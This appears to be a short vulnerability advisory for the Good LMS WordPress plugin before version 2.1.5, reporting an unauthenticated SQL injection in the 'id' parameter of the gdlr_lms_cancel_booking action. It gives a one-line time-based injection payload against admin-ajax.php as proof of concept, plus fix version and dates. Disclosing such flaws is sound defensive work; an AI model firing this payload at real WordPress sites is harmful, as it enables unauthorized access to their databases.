WordPress Plugin Vulnerabilities
Good LMS < 2.1.5 - Unauthenticated SQL Injection
Description
The Good LMS WordPress plugin was vulnerable to Unauthenticated SQL Injection in its 'id' parameter of the gdlr_lms_cancel_booking action.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1 action=gdlr_lms_cancel_booking&id=(SELECT 1337 FROM (SELECT(SLEEP(10)))MrMV)
Affects Plugins
Fixed in version 2.1.5
References
Classification
Miscellaneous
Timeline
Publicly Published
2020-11-12 (about 1 years ago)
Added
2020-11-12 (about 1 years ago)
Last Updated
2020-11-17 (about 1 years ago)